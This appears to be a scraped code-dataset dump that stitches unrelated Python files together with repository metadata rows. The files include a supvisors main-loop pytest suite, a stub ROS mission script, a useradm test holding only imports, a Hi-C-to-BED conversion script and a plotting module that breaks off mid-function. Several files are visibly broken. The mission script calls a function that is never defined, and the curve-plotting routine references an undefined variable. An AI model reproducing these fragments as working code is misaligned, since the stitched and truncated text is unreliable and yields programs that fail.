] | null | null | null | ATIVIDAS UF/exemplos.py | alverad-katsuro/Python | 6ba3cc604fd9cde3ee012fcf17bbf6cd944e8c38 | [
"MIT"
] | null | null | null | from math import log
| 43.895238 | 129 | 0.653179 |
49af0bc491e51d1946b18c865a7ad51bc62f12c7 | 15,786 | py | Python | supvisors/tests/test_mainloop.py | julien6387/supvisors | 4e32bce566dec2cf9e9a213a3698178030eb869b | [
"Apache-2.0"
] | 66 | 2017-01-05T11:28:34.000Z | 2022-03-04T08:42:01.000Z | supvisors/tests/test_mainloop.py | julien6387/supvisors | 4e32bce566dec2cf9e9a213a3698178030eb869b | [
"Apache-2.0"
] | 36 | 2016-12-30T10:46:58.000Z | 2022-01-09T22:56:10.000Z | supvisors/tests/test_mainloop.py | julien6387/supvisors | 4e32bce566dec2cf9e9a213a3698178030eb869b | [
"Apache-2.0"
] | 12 | 2017-03-04T04:53:51.000Z | 2022-01-28T13:03:22.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
# ======================================================================
# Copyright 2017 Julien LE CLEACH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================================================
import pytest
from supvisors.mainloop import *
from supvisors.ttypes import AddressStates
from supvisors.utils import DeferredRequestHeaders
from threading import Thread
from unittest.mock import call, patch, Mock, DEFAULT
from .base import DummyRpcInterface
def test_creation(supvisors, mocked_rpc, main_loop):
""" Test the values set at construction. """
assert isinstance(main_loop, Thread)
assert main_loop.supvisors is supvisors
assert not main_loop.stop_event.is_set()
assert main_loop.env == {'SUPERVISOR_SERVER_URL': 'http://127.0.0.1:65000',
'SUPERVISOR_USERNAME': '',
'SUPERVISOR_PASSWORD': ''}
assert mocked_rpc.call_args_list == [call('localhost', main_loop.env)]
def test_stopping(mocked_rpc, main_loop):
""" Test the get_loop method. """
assert not main_loop.stopping()
main_loop.stop_event.set()
assert main_loop.stopping()
def test_stop(mocker, mocked_rpc, main_loop):
""" Test the stopping of the main loop thread. """
mocked_join = mocker.patch.object(main_loop, 'join')
# try to stop main loop before it is started
main_loop.stop()
assert not main_loop.stop_event.is_set()
assert not mocked_join.called
# stop main loop when alive
mocker.patch.object(main_loop, 'is_alive', return_value=True)
main_loop.stop()
assert main_loop.stop_event.is_set()
assert mocked_join.call_count == 1
def test_run(mocker, main_loop):
""" Test the running of the main loop thread. """
mocked_evt = mocker.patch('supvisors.mainloop.SupvisorsMainLoop.check_events')
mocked_req = mocker.patch('supvisors.mainloop.SupvisorsMainLoop.check_requests')
mocked_poll = mocker.patch('supvisors.supvisorszmq.SupvisorsZmq.poll')
# patch one loops
mocker.patch.object(main_loop, 'stopping', side_effect=[False, False, True])
main_loop.run()
# test that poll was called once
assert mocked_poll.call_args_list == [call()]
# test that check_requests was called once
assert mocked_evt.call_count == 1
# test that check_events was called once
assert mocked_req.call_count == 1
def test_check_events(mocker, main_loop):
""" Test the processing of the events received. """
mocked_send = mocker.patch('supvisors.mainloop.SupvisorsMainLoop.send_remote_comm_event')
# prepare context
mocked_sockets = Mock(**{'check_subscriber.return_value': None})
# test with empty socks
main_loop.check_events(mocked_sockets, 'poll result')
assert mocked_sockets.check_subscriber.call_args_list == [call('poll result')]
assert not mocked_send.called
# reset mocks
mocked_sockets.check_subscriber.reset_mock()
# test with appropriate socks but with exception
mocked_sockets.check_subscriber.return_value = 'a message'
main_loop.check_events(mocked_sockets, 'poll result')
assert mocked_sockets.check_subscriber.call_args_list == [call('poll result')]
assert mocked_send.call_args_list == [call('event', '"a message"')]
def test_check_requests(mocker, main_loop):
""" Test the processing of the requests received. """
mocked_send = mocker.patch('supvisors.mainloop.SupvisorsMainLoop.send_request')
# prepare context
mocked_sockets = Mock(**{'check_puller.return_value': None})
# test with empty socks
main_loop.check_requests(mocked_sockets, 'poll result')
assert mocked_sockets.check_puller.call_args_list == [call('poll result')]
assert not mocked_sockets.disconnect_subscriber.called
assert not mocked_send.called
# reset mocks
mocked_sockets.check_puller.reset_mock()
# test with appropriate socks but with exception
mocked_sockets.check_puller.return_value = DeferredRequestHeaders.ISOLATE_NODES, 'a message'
main_loop.check_requests(mocked_sockets, 'poll result')
assert mocked_sockets.check_puller.call_args_list == [call('poll result')]
assert mocked_sockets.disconnect_subscriber.call_args_list == [call('a message')]
assert not mocked_send.called
# reset mocks
mocked_sockets.check_puller.reset_mock()
mocked_sockets.disconnect_subscriber.reset_mock()
# test with appropriate socks but with exception
mocked_sockets.check_puller.return_value = 'event', 'a message'
main_loop.check_requests(mocked_sockets, 'poll result')
assert mocked_sockets.check_puller.call_args_list == [call('poll result')]
assert not mocked_sockets.disconnect_subscriber.called
assert mocked_send.call_args_list == [call('event', 'a message')]
def test_check_node(mocker, mocked_rpc, main_loop):
""" Test the protocol to get the processes handled by a remote Supervisor. """
mocker.patch('supvisors.mainloop.stderr')
mocked_evt = mocker.patch('supvisors.mainloop.SupvisorsMainLoop.send_remote_comm_event')
# test rpc error: no event is sent to local Supervisor
mocked_rpc.side_effect = ValueError
main_loop.check_node('10.0.0.1')
assert mocked_rpc.call_count == 2
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
assert mocked_evt.call_count == 0
# test with a mocked rpc interface
dummy_info = [{'name': 'proc', 'group': 'appli', 'state': 10, 'start': 5,
'now': 10, 'pid': 1234, 'spawnerr': ''}]
rpc_intf = DummyRpcInterface()
mocked_all = rpc_intf.supervisor.getAllProcessInfo = Mock()
mocked_local = rpc_intf.supvisors.get_all_local_process_info = Mock(return_value=dummy_info)
mocked_addr = rpc_intf.supvisors.get_address_info = Mock()
rpc_intf.supvisors.get_master_address = Mock(return_value='10.0.0.5')
rpc_intf.supvisors.get_supvisors_state = Mock(return_value={'statename': 'RUNNING'})
mocked_rpc.return_value = rpc_intf
mocked_rpc.side_effect = None
mocked_rpc.reset_mock()
# test with address in isolation
for state in [AddressStates.ISOLATING, AddressStates.ISOLATED]:
mocked_addr.return_value = {'statecode': state}
main_loop.check_node('10.0.0.1')
assert mocked_rpc.call_args_list == [call('10.0.0.1', main_loop.env)]
expected = 'node_name:10.0.0.1 authorized:False master_node_name:10.0.0.5 supvisors_state:RUNNING'
assert mocked_evt.call_args_list == [call('auth', expected)]
assert not mocked_all.called
# reset counters
mocked_evt.reset_mock()
mocked_rpc.reset_mock()
# test with address not in isolation
for state in [AddressStates.UNKNOWN, AddressStates.CHECKING, AddressStates.RUNNING, AddressStates.SILENT]:
mocked_addr.return_value = {'statecode': state}
main_loop.check_node('10.0.0.1')
assert mocked_rpc.call_count == 1
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
assert mocked_evt.call_count == 2
assert mocked_local.call_count == 1
# reset counters
mocked_evt.reset_mock()
mocked_local.reset_mock()
mocked_rpc.reset_mock()
def test_start_process(mocker, mocked_rpc, main_loop):
""" Test the protocol to start a process handled by a remote Supervisor. """
mocker.patch('supvisors.mainloop.stderr')
# test rpc error
mocked_rpc.side_effect = KeyError
main_loop.start_process('10.0.0.1', 'dummy_process', 'extra args')
assert mocked_rpc.call_count == 2
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
# test with a mocked rpc interface
rpc_intf = DummyRpcInterface()
mocked_rpc.side_effect = None
mocked_rpc.return_value = rpc_intf
mocked_supvisors = mocker.patch.object(rpc_intf.supvisors, 'start_args')
main_loop.start_process('10.0.0.1', 'dummy_process', 'extra args')
assert mocked_rpc.call_count == 3
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
assert mocked_supvisors.call_count == 1
assert mocked_supvisors.call_args == call('dummy_process', 'extra args', False)
def test_stop_process(mocker, mocked_rpc, main_loop):
""" Test the protocol to stop a process handled by a remote Supervisor. """
mocker.patch('supvisors.mainloop.stderr')
# test rpc error
mocked_rpc.side_effect = ConnectionResetError
main_loop.stop_process('10.0.0.1', 'dummy_process')
assert mocked_rpc.call_count == 2
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
# test with a mocked rpc interface
rpc_intf = DummyRpcInterface()
mocked_rpc.side_effect = None
mocked_rpc.return_value = rpc_intf
mocked_supervisor = mocker.patch.object(rpc_intf.supervisor, 'stopProcess')
main_loop.stop_process('10.0.0.1', 'dummy_process')
assert mocked_rpc.call_count == 3
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
assert mocked_supervisor.call_count == 1
assert mocked_supervisor.call_args == call('dummy_process', False)
def test_restart(mocker, mocked_rpc, main_loop):
""" Test the protocol to restart a remote Supervisor. """
mocker.patch('supvisors.mainloop.stderr')
# test rpc error
mocked_rpc.side_effect = OSError
main_loop.restart('10.0.0.1')
assert mocked_rpc.call_count == 2
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
# test with a mocked rpc interface
rpc_intf = DummyRpcInterface()
mocked_rpc.side_effect = None
mocked_rpc.return_value = rpc_intf
mocked_supervisor = mocker.patch.object(rpc_intf.supervisor, 'restart')
main_loop.restart('10.0.0.1')
assert mocked_rpc.call_count == 3
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
assert mocked_supervisor.call_count == 1
assert mocked_supervisor.call_args == call()
def test_shutdown(mocker, mocked_rpc, main_loop):
""" Test the protocol to shutdown a remote Supervisor. """
mocker.patch('supvisors.mainloop.stderr')
# test rpc error
mocked_rpc.side_effect = RPCError(12)
main_loop.shutdown('10.0.0.1')
assert mocked_rpc.call_count == 2
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
# test with a mocked rpc interface
rpc_intf = DummyRpcInterface()
mocked_rpc.side_effect = None
mocked_rpc.return_value = rpc_intf
mocked_shutdown = mocker.patch.object(rpc_intf.supervisor, 'shutdown')
main_loop.shutdown('10.0.0.1')
assert mocked_rpc.call_count == 3
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
assert mocked_shutdown.call_count == 1
assert mocked_shutdown.call_args == call()
def test_restart_all(mocker, mocked_rpc, main_loop):
""" Test the protocol to restart Supvisors. """
mocker.patch('supvisors.mainloop.stderr')
# test rpc error
mocked_rpc.side_effect = OSError
main_loop.restart_all('10.0.0.1')
assert mocked_rpc.call_count == 2
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
# test with a mocked rpc interface
rpc_intf = DummyRpcInterface()
mocked_rpc.side_effect = None
mocked_rpc.return_value = rpc_intf
mocked_supervisor = mocker.patch.object(rpc_intf.supvisors, 'restart')
main_loop.restart_all('10.0.0.1')
assert mocked_rpc.call_count == 3
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
assert mocked_supervisor.call_count == 1
assert mocked_supervisor.call_args == call()
def test_shutdown_all(mocker, mocked_rpc, main_loop):
""" Test the protocol to shutdown Supvisors. """
mocker.patch('supvisors.mainloop.stderr')
# test rpc error
mocked_rpc.side_effect = RPCError(12)
main_loop.shutdown_all('10.0.0.1')
assert mocked_rpc.call_count == 2
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
# test with a mocked rpc interface
rpc_intf = DummyRpcInterface()
mocked_rpc.side_effect = None
mocked_rpc.return_value = rpc_intf
mocked_shutdown = mocker.patch.object(rpc_intf.supvisors, 'shutdown')
main_loop.shutdown_all('10.0.0.1')
assert mocked_rpc.call_count == 3
assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
assert mocked_shutdown.call_count == 1
assert mocked_shutdown.call_args == call()
def test_comm_event(mocker, mocked_rpc, main_loop):
""" Test the protocol to send a comm event to the local Supervisor. """
mocker.patch('supvisors.mainloop.stderr')
# test rpc error
mocker.patch.object(main_loop.proxy.supervisor, 'sendRemoteCommEvent', side_effect=RPCError(100))
main_loop.send_remote_comm_event('event type', 'event data')
# test with a mocked rpc interface
mocked_supervisor = mocker.patch.object(main_loop.proxy.supervisor, 'sendRemoteCommEvent')
main_loop.send_remote_comm_event('event type', 'event data')
assert mocked_supervisor.call_args_list == [call('event type', 'event data')]
def check_call(main_loop, mocked_loop, method_name, request, args):
""" Perform a main loop request and check what has been called. """
# send request
main_loop.send_request(request.value, args)
# test mocked main loop
for key, mocked in mocked_loop.items():
if key == method_name:
assert mocked.call_count == 1
assert mocked.call_args == call(*args)
mocked.reset_mock()
else:
assert not mocked.called
def test_send_request(mocker, main_loop):
""" Test the execution of a deferred Supervisor request. """
# patch main loop subscriber
mocked_loop = mocker.patch.multiple(main_loop, check_node=DEFAULT,
start_process=DEFAULT, stop_process=DEFAULT,
restart=DEFAULT, shutdown=DEFAULT,
restart_all=DEFAULT, shutdown_all=DEFAULT)
# test check address
check_call(main_loop, mocked_loop, 'check_node',
DeferredRequestHeaders.CHECK_NODE, ('10.0.0.2',))
# test start process
check_call(main_loop, mocked_loop, 'start_process',
DeferredRequestHeaders.START_PROCESS, ('10.0.0.2', 'dummy_process', 'extra args'))
# test stop process
check_call(main_loop, mocked_loop, 'stop_process',
DeferredRequestHeaders.STOP_PROCESS, ('10.0.0.2', 'dummy_process'))
# test restart
check_call(main_loop, mocked_loop, 'restart',
DeferredRequestHeaders.RESTART, ('10.0.0.2',))
# test shutdown
check_call(main_loop, mocked_loop, 'shutdown',
DeferredRequestHeaders.SHUTDOWN, ('10.0.0.2',))
# test restart_all
check_call(main_loop, mocked_loop, 'restart_all',
DeferredRequestHeaders.RESTART_ALL, ('10.0.0.2',))
# test shutdown
check_call(main_loop, mocked_loop, 'shutdown_all',
DeferredRequestHeaders.SHUTDOWN_ALL, ('10.0.0.2',))
| 43.607735 | 110 | 0.705752 |
49afc71691a68c9b40e3421c08e29b8368b54b60 | 2,815 | py | Python | wolf_control/scripts/mission.py | ncsurobotics/SW8S-ROS | 9f7f5811fe1a1a8d5d0de0b791ce757fcaeb5759 | [
"MIT"
] | null | null | null | wolf_control/scripts/mission.py | ncsurobotics/SW8S-ROS | 9f7f5811fe1a1a8d5d0de0b791ce757fcaeb5759 | [
"MIT"
] | null | null | null | wolf_control/scripts/mission.py | ncsurobotics/SW8S-ROS | 9f7f5811fe1a1a8d5d0de0b791ce757fcaeb5759 | [
"MIT"
] | 1 | 2022-03-30T19:12:52.000Z | 2022-03-30T19:12:52.000Z | #!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist, TransformStamped
from std_msgs.msg import String
from enum import Enum
import tf2_ros
import math
if __name__ == '__main__':
try:
mission()
except rospy.ROSInterruptException:
pass
| 38.040541 | 105 | 0.596448 |
49b0052d2675e4f9dc69452f3b5d084691e4a664 | 19,202 | py | Python | tests/tests/test_api_management.py | MaciejTe/useradm | 4962000db94bc7d9e80b81c4389f6f769d0d062a | [
"Apache-2.0"
] | 8 | 2017-02-27T08:58:08.000Z | 2020-05-25T14:37:24.000Z | tests/tests/test_api_management.py | MaciejTe/useradm | 4962000db94bc7d9e80b81c4389f6f769d0d062a | [
"Apache-2.0"
] | 263 | 2016-11-17T15:02:26.000Z | 2022-03-31T10:04:09.000Z | tests/tests/test_api_management.py | MaciejTe/useradm | 4962000db94bc7d9e80b81c4389f6f769d0d062a | [
"Apache-2.0"
] | 25 | 2016-11-16T15:45:38.000Z | 2020-12-19T09:56:16.000Z | #!/usr/bin/python
# Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from common import (
init_users,
init_users_f,
init_users_mt,
init_users_mt_f,
cli,
api_client_mgmt,
mongo,
make_auth,
)
import bravado
import pytest
import tenantadm
| 38.327345 | 86 | 0.672638 |
49b03158777693b6348d205c910ad771b55e53ea | 1,167 | py | Python | scripts/convert_to_bed.py | Lila14/multimds | e54642e0ae47592321352f931f534881ca57d888 | [
"MIT"
] | 1 | 2019-10-29T12:33:57.000Z | 2019-10-29T12:33:57.000Z | scripts/convert_to_bed.py | Lila14/multimds | e54642e0ae47592321352f931f534881ca57d888 | [
"MIT"
] | null | null | null | scripts/convert_to_bed.py | Lila14/multimds | e54642e0ae47592321352f931f534881ca57d888 | [
"MIT"
] | null | null | null | import os
chrom_bins = {}
with open("GSE88952_Sc_Su.32000.bed") as in_file:
for line in in_file:
line = line.strip().split()
chrom_bins[line[3]] = "{}\t{}\t{}".format(line[0], line[1], line[2])
in_file.close()
if not os.path.isfile("ctrl_32kb.bed"):
with open("ctrl_32kb.bed", "w") as out_file:
with open("ctrl_32kb_matrix.txt") as in_file:
for line in in_file:
line = line.strip().split()
bin1 = line[0]
chrom_string1 = chrom_bins[bin1]
bin2 = line[1]
chrom_string2 = chrom_bins[bin2]
if float(line[3]) != 0:
out_file.write("\t".join((chrom_string1, chrom_string2, line[3])))
out_file.write("\n")
in_file.close()
out_file.close()
if not os.path.isfile("galactose_32kb.bed"):
with open("galactose_32kb.bed", "w") as out_file:
with open("galactose_32kb_matrix.txt") as in_file:
for line in in_file:
line = line.strip().split()
bin1 = line[0]
chrom_string1 = chrom_bins[bin1]
bin2 = line[1]
chrom_string2 = chrom_bins[bin2]
if float(line[3]) != 0:
out_file.write("\t".join((chrom_string1, chrom_string2, line[3])))
out_file.write("\n")
in_file.close()
out_file.close()
| 29.175 | 71 | 0.652956 |
49b1fd488e00bd5cbf7211a994c7ac528083422a | 21,956 | py | Python | xinshuo_visualization/prob_stat_vis.py | xinshuoweng/Xinshuo_PyToolbox | ce4cf0398f24c5a611af9d94dc0bf2a9104a3716 | [
"MIT"
] | 31 | 2020-03-05T12:27:21.000Z | 2022-03-07T04:00:18.000Z | xinshuo_visualization/prob_stat_vis.py | xinshuoweng/Xinshuo_PyToolbox | ce4cf0398f24c5a611af9d94dc0bf2a9104a3716 | [
"MIT"
] | null | null | null | xinshuo_visualization/prob_stat_vis.py | xinshuoweng/Xinshuo_PyToolbox | ce4cf0398f24c5a611af9d94dc0bf2a9104a3716 | [
"MIT"
] | 12 | 2020-07-06T05:06:58.000Z | 2021-11-18T14:43:20.000Z | # Author: Xinshuo Weng
# email: xinshuo.weng@gmail.com
import matplotlib.pyplot as plt, numpy as np
# import seaborn as sns
# from pandas import DataFrame
# from sklearn.neighbors import NearestNeighbors
from terminaltables import AsciiTable
from collections import Counter
from .private import save_vis_close_helper, get_fig_ax_helper
from xinshuo_miscellaneous import isdict, islogical, is_path_exists, isscalar, islist, is_path_exists_or_creatable, CHECK_EQ_LIST_UNORDERED, isnparray, isinteger, isstring, scalarlist2strlist, islistoflist, iscolorimage_dimension, isgrayimage_dimension, istuple
from xinshuo_math import calculate_truncated_mse
color_set = ['r', 'b', 'g', 'c', 'm', 'y', 'k', 'w', 'lime', 'cyan', 'aqua']
linestyle_set = ['-', '--', '-.', ':', None, ' ', 'solid', 'dashed']
dpi = 80
def visualize_ced(normed_mean_error_dict, error_threshold, normalized=True, truncated_list=None, display2terminal=True, display_list=None, title='2D PCK curve', debug=True, vis=False, pck_savepath=None, table_savepath=None, closefig=True):
'''
visualize the cumulative error distribution curve (alse called NME curve or pck curve)
all parameters are represented by percentage
parameter:
normed_mean_error_dict: a dictionary whose keys are the method name and values are (N, ) numpy array to represent error in evaluation
error_threshold: threshold to display in x axis
return:
AUC: area under the curve
MSE: mean square error
'''
if debug:
assert isdict(normed_mean_error_dict), 'the input normalized mean error dictionary is not correct'
assert islogical(normalized), 'the normalization flag should be logical'
if normalized: assert error_threshold > 0 and error_threshold < 100, 'threshold percentage is not well set'
if save:
assert is_path_exists_or_creatable(pck_savepath), 'please provide a valid path to save the pck results'
assert is_path_exists_or_creatable(table_savepath), 'please provide a valid path to save the table results'
assert isstring(title), 'title is not correct'
if truncated_list is not None: assert islistofscalar(truncated_list), 'the input truncated list is not correct'
if display_list is not None:
assert islist(display_list) and len(display_list) == len(normed_mean_error_dict), 'the input display list is not correct'
assert CHECK_EQ_LIST_UNORDERED(display_list, normed_mean_error_dict.keys(), debug=debug), 'the input display list does not match the error dictionary key list'
else: display_list = normed_mean_error_dict.keys()
# set display parameters
width, height = 1000, 800
legend_fontsize = 10
scale_distance = 48.8
line_index, color_index = 0, 0
figsize = width / float(dpi), height / float(dpi)
fig = plt.figure(figsize=figsize)
# set figure handle
num_bins = 1000
if normalized:
maximum_x = 1
scale = num_bins / 100
else:
maximum_x = error_threshold + 1
scale = num_bins / maximum_x
x_axis = np.linspace(0, maximum_x, num_bins) # error axis, percentage of normalization factor
y_axis = np.zeros(num_bins)
interval_y = 10
interval_x = 1
plt.xlim(0, error_threshold)
plt.ylim(0, 100)
plt.yticks(np.arange(0, 100 + interval_y, interval_y))
plt.xticks(np.arange(0, error_threshold + interval_x, interval_x))
plt.grid()
plt.title(title, fontsize=20)
if normalized: plt.xlabel('Normalized error euclidean distance (%)', fontsize=16)
else: plt.xlabel('Absolute error euclidean distance', fontsize=16)
# calculate metrics for each method
num_methods = len(normed_mean_error_dict)
num_images = len(normed_mean_error_dict.values()[0])
metrics_dict = dict()
metrics_table = list()
table_title = ['Method Name / Metrics', 'AUC', 'MSE']
append2title = False
assert num_images > 0, 'number of error array should be larger than 0'
for ordered_index in range(num_methods):
method_name = display_list[ordered_index]
normed_mean_error = normed_mean_error_dict[method_name]
if debug:
assert isnparray(normed_mean_error) and normed_mean_error.ndim == 1, 'shape of error distance is not good'
assert len(normed_mean_error) == num_images, 'number of testing images should be equal for all methods'
assert len(linestyle_set) * len(color_set) >= len(normed_mean_error_dict)
color_tmp = color_set[color_index]
line_tmp = linestyle_set[line_index]
for i in range(num_bins):
y_axis[i] = float((normed_mean_error < x_axis[i]).sum()) / num_images # percentage of error
# calculate area under the curve and mean square error
entry = dict()
entry['AUC'] = np.sum(y_axis[:error_threshold * scale]) / (error_threshold * scale) # bigger, better
entry['MSE'] = np.mean(normed_mean_error) # smaller, better
metrics_table_tmp = [str(method_name), '%.2f' % (entry['AUC']), '%.1f' % (entry['MSE'])]
if truncated_list is not None:
tmse_dict = calculate_truncated_mse(normed_mean_error.tolist(), truncated_list, debug=debug)
for threshold in truncated_list:
entry['AUC/%s'%threshold] = np.sum(y_axis[:error_threshold * scale]) / (error_threshold * scale) # bigger, better
entry['MSE/%s'%threshold] = tmse_dict[threshold]['T-MSE']
entry['percentage/%s'%threshold] = tmse_dict[threshold]['percentage']
if not append2title:
table_title.append('AUC/%s'%threshold)
table_title.append('MSE/%s'%threshold)
table_title.append('pct/%s'%threshold)
metrics_table_tmp.append('%.2f' % (entry['AUC/%s'%threshold]))
metrics_table_tmp.append('%.1f' % (entry['MSE/%s'%threshold]))
metrics_table_tmp.append('%.1f' % (100 * entry['percentage/%s'%threshold]) + '%')
# print metrics_table_tmp
metrics_table.append(metrics_table_tmp)
append2title = True
metrics_dict[method_name] = entry
# draw
label = '%s, AUC: %.2f, MSE: %.1f (%.0f um)' % (method_name, entry['AUC'], entry['MSE'], entry['MSE'] * scale_distance)
if normalized: plt.plot(x_axis*100, y_axis*100, color=color_tmp, linestyle=line_tmp, label=label, lw=3)
else: plt.plot(x_axis, y_axis*100, color=color_tmp, linestyle=line_tmp, label=label, lw=3)
plt.legend(loc=4, fontsize=legend_fontsize)
color_index += 1
if color_index / len(color_set) == 1:
line_index += 1
color_index = color_index % len(color_set)
# plt.grid()
plt.ylabel('{} Test Images (%)'.format(num_images), fontsize=16)
save_vis_close_helper(fig=fig, ax=None, vis=vis, transparent=False, save_path=pck_savepath, debug=debug, closefig=closefig)
# reorder the table
order_index_list = [display_list.index(method_name_tmp) for method_name_tmp in normed_mean_error_dict.keys()]
order_index_list = [0] + [order_index_tmp + 1 for order_index_tmp in order_index_list]
# print table to terminal
metrics_table = [table_title] + metrics_table
# metrics_table = list_reorder([table_title] + metrics_table, order_index_list, debug=debug)
table = AsciiTable(metrics_table)
if display2terminal:
print('\nprint detailed metrics')
print(table.table)
# save table to file
if table_savepath is not None:
table_file = open(table_savepath, 'w')
table_file.write(table.table)
table_file.close()
if display2terminal: print('\nsave detailed metrics to %s' % table_savepath)
return metrics_dict, metrics_table
def visualize_nearest_neighbor(featuremap_dict, num_neighbor=5, top_number=5, vis=True, save_csv=False, csv_save_path=None, save_vis=False, save_img=False, save_thumb_name='nearest_neighbor.png', img_src_folder=None, ext_filter='.jpg', nn_save_folder=None, debug=True):
'''
visualize nearest neighbor for featuremap from images
parameter:
featuremap_dict: a dictionary contains image path as key, and featuremap as value, the featuremap needs to be numpy array with any shape. No flatten needed
num_neighbor: number of neighbor to visualize, the first nearest is itself
top_number: number of top to visualize, since there might be tons of featuremap (length of dictionary), we choose the top ten with lowest distance with their nearest neighbor
csv_save_path: path to save .csv file which contains indices and distance array for all elements
nn_save_folder: save the nearest neighbor images for top featuremap
return:
all_sorted_nearest_id: a 2d matrix, each row is a feature followed by its nearest neighbor in whole feature dataset, the column is sorted by the distance of all nearest neighbor each row
selected_nearest_id: only top number of sorted nearest id
'''
print('processing feature map to nearest neightbor.......')
if debug:
assert isdict(featuremap_dict), 'featuremap should be dictionary'
assert all(isnparray(featuremap_tmp) for featuremap_tmp in featuremap_dict.values()), 'value of dictionary should be numpy array'
assert isinteger(num_neighbor) and num_neighbor > 1, 'number of neighborhodd is an integer larger than 1'
if save_csv and csv_save_path is not None:
assert is_path_exists_or_creatable(csv_save_path), 'path to save .csv file is not correct'
if save_vis or save_img:
if nn_save_folder is not None: # save image directly
assert isstring(ext_filter), 'extension filter is not correct'
assert is_path_exists(img_src_folder), 'source folder for image is not correct'
assert all(isstring(path_tmp) for path_tmp in featuremap_dict.keys()) # key should be the path for the image
assert is_path_exists_or_creatable(nn_save_folder), 'folder to save top visualized images is not correct'
assert isstring(save_thumb_name), 'name of thumbnail is not correct'
if ext_filter.find('.') == -1:
ext_filter = '.%s' % ext_filter
# flatten the feature map
nn_feature_dict = dict()
for key, featuremap_tmp in featuremap_dict.items():
nn_feature_dict[key] = featuremap_tmp.flatten()
num_features = len(nn_feature_dict)
# nearest neighbor
featuremap = np.array(nn_feature_dict.values())
nearbrs = NearestNeighbors(n_neighbors=num_neighbor, algorithm='ball_tree').fit(featuremap)
distances, indices = nearbrs.kneighbors(featuremap)
if debug:
assert featuremap.shape[0] == num_features, 'shape of feature map is not correct'
assert indices.shape == (num_features, num_neighbor), 'shape of indices is not correct'
assert distances.shape == (num_features, num_neighbor), 'shape of indices is not correct'
# convert the nearest indices for all featuremap to the key accordingly
id_list = nn_feature_dict.keys()
max_length = len(max(id_list, key=len)) # find the maximum length of string in the key
nearest_id = np.chararray(indices.shape, itemsize=max_length+1)
for x in range(nearest_id.shape[0]):
for y in range(nearest_id.shape[1]):
nearest_id[x, y] = id_list[indices[x, y]]
if debug:
assert list(nearest_id[:, 0]) == id_list, 'nearest neighbor has problem'
# sort the feature based on distance
print('sorting the feature based on distance')
featuremap_distance = np.sum(distances, axis=1)
if debug:
assert featuremap_distance.shape == (num_features, ), 'distance is not correct'
sorted_indices = np.argsort(featuremap_distance)
all_sorted_nearest_id = nearest_id[sorted_indices, :]
# save to the csv file
if save_csv and csv_save_path is not None:
print('Saving nearest neighbor result as .csv to path: %s' % csv_save_path)
with open(csv_save_path, 'w+') as file:
np.savetxt(file, distances, delimiter=',', fmt='%f')
np.savetxt(file, all_sorted_nearest_id, delimiter=',', fmt='%s')
file.close()
# choose the best to visualize
selected_sorted_indices = sorted_indices[0:top_number]
if debug:
for i in range(num_features-1):
assert featuremap_distance[sorted_indices[i]] < featuremap_distance[sorted_indices[i+1]], 'feature map is not well sorted based on distance'
selected_nearest_id = nearest_id[selected_sorted_indices, :]
if save_vis:
fig, axarray = plt.subplots(top_number, num_neighbor)
for index in range(top_number):
for nearest_index in range(num_neighbor):
img_path = os.path.join(img_src_folder, '%s%s'%(selected_nearest_id[index, nearest_index], ext_filter))
if debug:
print('loading image from %s'%img_path)
img = imread(img_path)
if isgrayimage_dimension(img):
axarray[index, nearest_index].imshow(img, cmap='gray')
elif iscolorimage_dimension(img):
axarray[index, nearest_index].imshow(img)
else:
assert False, 'unknown error'
axarray[index, nearest_index].axis('off')
save_thumb = os.path.join(nn_save_folder, save_thumb_name)
fig.savefig(save_thumb)
if vis:
plt.show()
plt.close(fig)
# save top visualization to the folder
if save_img and nn_save_folder is not None:
for top_index in range(top_number):
file_list = selected_nearest_id[top_index]
save_subfolder = os.path.join(nn_save_folder, file_list[0])
mkdir_if_missing(save_subfolder)
for file_tmp in file_list:
file_src = os.path.join(img_src_folder, '%s%s'%(file_tmp, ext_filter))
save_path = os.path.join(save_subfolder, '%s%s'%(file_tmp, ext_filter))
if debug:
print('saving %s to %s' % (file_src, save_path))
shutil.copyfile(file_src, save_path)
return all_sorted_nearest_id, selected_nearest_id
def visualize_distribution(data, bin_size=None, vis=False, save_path=None, debug=True, closefig=True):
'''
visualize the histogram of a data, which can be a dictionary or list or numpy array or tuple or a list of list
'''
if debug:
assert istuple(data) or isdict(data) or islist(data) or isnparray(data), 'input data is not correct'
# convert data type
if istuple(data):
data = list(data)
elif isdict(data):
data = data.values()
elif isnparray(data):
data = data.tolist()
num_bins = 1000.0
fig, ax = get_fig_ax_helper(fig=None, ax=None)
# calculate bin size
if bin_size is None:
if islistoflist(data):
max_value = np.max(np.max(data))
min_value = np.min(np.min(data))
else:
max_value = np.max(data)
min_value = np.min(data)
bin_size = (max_value - min_value) / num_bins
else:
try:
bin_size = float(bin_size)
except TypeError:
print('size of bin should be an float value')
# plot
if islistoflist(data):
max_value = np.max(np.max(data))
